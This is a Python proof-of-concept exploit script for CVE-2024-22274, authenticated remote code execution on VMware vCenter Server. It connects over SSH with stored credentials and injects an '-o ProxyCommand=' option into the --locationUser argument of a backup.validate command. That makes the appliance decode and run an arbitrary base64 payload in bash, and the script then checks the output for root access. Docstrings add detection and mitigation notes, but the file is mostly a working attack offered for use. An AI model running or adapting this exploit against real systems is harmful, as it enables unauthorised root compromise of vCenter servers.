import base64
import argparse
from fabric import Connection
from colorama import Fore, Style, init
# colorama setup: with autoreset=True the colour/style state is reset after
# every print call, so a colour code cannot leak into later output.
init(autoreset=True)
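def ssh_credentials(config_file):
    """Read SSH login settings from a ``key=value`` text file.

    Each line is split on the first ``=`` only, so a value may itself contain
    ``=``. Blank lines and lines without ``=`` are skipped; previously they
    raised ``ValueError`` on tuple unpacking (a trailing empty line was enough).
    Whitespace around the key is removed so ``username = x`` is found by
    ``credentials.get('username')``; the value is kept as written apart from
    the outer whitespace stripped from the whole line.

    Security note: the file holds the appliance password in plaintext. Keep it
    readable by the owner only and out of version control.

    Args:
        config_file: Path to the credentials file.

    Returns:
        dict mapping every key found in the file to its string value.

    Raises:
        OSError: if the file cannot be opened or read.
    """
    credentials = {}
    with open(config_file, 'r') as file:
        for line in file:
            entry = line.strip()
            # Skip anything that is not a key=value pair instead of crashing.
            if not entry or '=' not in entry:
                continue
            key, value = entry.split('=', 1)
            credentials[key.strip()] = value
    return credentials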
def exploit(host, port, payload_path, credentials):
    """Attempt to run a crafted ``backup.validate`` command on ``host`` over SSH.

    Proof-of-concept for CVE-2024-22274. The attempt is authenticated: it needs
    a valid ``username``/``password`` pair for the target's SSH service, taken
    from ``credentials``.

    Steps, in order: read ``payload_path`` and base64-decode its content to
    text; build the command string; check that both credentials are present;
    create a Fabric ``Connection`` using password authentication; run the
    command with its output hidden; print the captured stdout and a verdict
    based on a substring check for ``root`` / ``uid=0``.

    Defender notes:
      * The ``--locationUser`` value in the command starts with
        ``-o ProxyCommand=``, i.e. it is shaped like a client option, not a
        user name. A ``backup.validate`` invocation whose ``--locationUser``
        begins with ``-`` is the indicator to look for in appliance-shell
        command/audit logs.
      * Mitigation is the vendor fix for CVE-2024-22274, plus limiting which
        accounts can reach the appliance shell over SSH.

    Args:
        host: Address of the SSH server to connect to.
        port: SSH port.
        payload_path: Path to a file holding base64 text.
        credentials: Mapping expected to contain ``username`` and ``password``.

    Returns:
        None. Every ``Exception`` raised inside the body is caught and printed,
        so callers cannot tell success from failure by the return value.
    """
    try:
        with open(payload_path, 'r') as file:
            payload_encoded = file.read().strip()
        # Decoded here only to text; an invalid base64 file fails at this line.
        decode_payload = base64.b64decode(payload_encoded).decode()
        # Appliance-shell command. The quoted --locationUser argument is the
        # injected part: it begins with an ``-o ProxyCommand=`` option.
        payload_command = f"""
backup.validate --parts common --locationType SFTP --location nowhere --locationUser '-o ProxyCommand=;/bin/bash -c \"{echo,{decode_payload}}|{base64,-d}|bash\" 2>' --locationPassword
"""
        username = credentials.get('username')
        password = credentials.get('password')
        # Raised inside the try block, so this is caught by the handler below
        # and shown as an error line rather than propagating to the caller.
        if not username or not password:
            raise ValueError(f"{Fore.LIGHTYELLOW_EX}Username or password not found in configuration file.{Style.RESET_ALL}")
        # Password authentication. NOTE(review): the connection object is
        # never closed explicitly in this function.
        conn = Connection(
            host=host,
            port=port,
            user=username,
            connect_kwargs={"password": password}
        )
        # NOTE(review): Fabric opens connections lazily on first use, so this
        # message appears to be printed before any network connection exists.
        print(f"{Fore.LIGHTGREEN_EX}[+] Connected to {Fore.LIGHTWHITE_EX}{host} via SSH{Style.RESET_ALL}")
        # hide=True keeps the remote output off the terminal; it is read from
        # result.stdout below.
        result = conn.run(payload_command, hide=True)
        print(f"{Fore.LIGHTGREEN_EX}[+] Payload executed successfully.{Fore.LIGHTWHITE_EX} Output: {result.stdout}{Style.RESET_ALL}")
        # Plain substring test on the lower-cased output: any occurrence of
        # "root" anywhere in stdout is reported as success.
        if "root" in result.stdout.lower() or "uid=0" in result.stdout.lower():
            print(f"{Fore.LIGHTGREEN_EX}[+] Exploitation successful: You have root access.{Style.RESET_ALL}")
        else:
            print(f"{Fore.LIGHTRED_EX}[+] Exploitation failed: Root access not obtained.{Style.RESET_ALL}")
        print(f"{Fore.LIGHTBLUE_EX}[+] Finished executing commands on {host}{Style.RESET_ALL}")
    except Exception as ex:
        # Catch-all: file access, base64 decoding, building the command string,
        # the missing-credential ValueError and SSH errors all end up here and
        # are only printed.
        print(f"{Fore.LIGHTRED_EX}[-] Error: {ex}{Style.RESET_ALL}")
def main():
    """Show the banner, read the command-line options and hand them to exploit().

    Options: ``-t/--target`` (required), ``-P/--port`` (int, default 22),
    ``-p/--payload`` (required) and ``-c/--config`` (default
    ``vCenter_creds.txt``). The credentials file is loaded with
    ``ssh_credentials`` before ``exploit`` is called; that load happens
    outside exploit()'s own error handling.
    """
    banner = f"""{Fore.LIGHTGREEN_EX}
___ ___ _______ ______ __
| | | | |.--.--.--.---.-.----.-----.______.--.--.| |.-----.-----.| |_.-----.----.
| | | || | | | _ | _| -__|______| | || ---|| -__| || _| -__| _|
\_____/|__|_|__||________|___._|__| |_____| \___/ |______||_____|__|__||____|_____|__|
Author: l0n3m4n | vCenter RCE: CVE-2024-22274 | PoC: @mbadanoiu
{Style.RESET_ALL}"""
    cli = argparse.ArgumentParser(
        description="Privileges Escalation: Authenticated Remote Code Execution in VMware vCenter Server",
        epilog=f"{Fore.LIGHTGREEN_EX}Exploit usage: python3 CVE-2024-22274-RCE.py -t 192.168.1.100 -P 22 -p payload.txt -c vCenter_creds.txt{Style.RESET_ALL}",
    )
    # The banner is printed before parsing, so it also shows on usage errors.
    print(banner)

    # Registered in this order so the generated help text keeps its layout.
    option_specs = (
        (('-t', '--target'), {'required': True, 'help': "Target Host address to connect to"}),
        (('-P', '--port'), {'type': int, 'default': 22, 'help': "Port number (default: 22)"}),
        (('-p', '--payload'), {'required': True, 'help': "File containing the base64-encoded payload"}),
        (('-c', '--config'), {'default': 'vCenter_creds.txt', 'help': "File containing SSH credentials (default: vCenter_creds.txt)"}),
    )
    for flags, settings in option_specs:
        cli.add_argument(*flags, **settings)

    options = cli.parse_args()
    login = ssh_credentials(options.config)
    exploit(
        host=options.target,
        port=options.port,
        payload_path=options.payload,
        credentials=login,
    )
# Run the command-line entry point only when the file is executed as a script,
# not when it is imported as a module.
if __name__ == "__main__":
    main()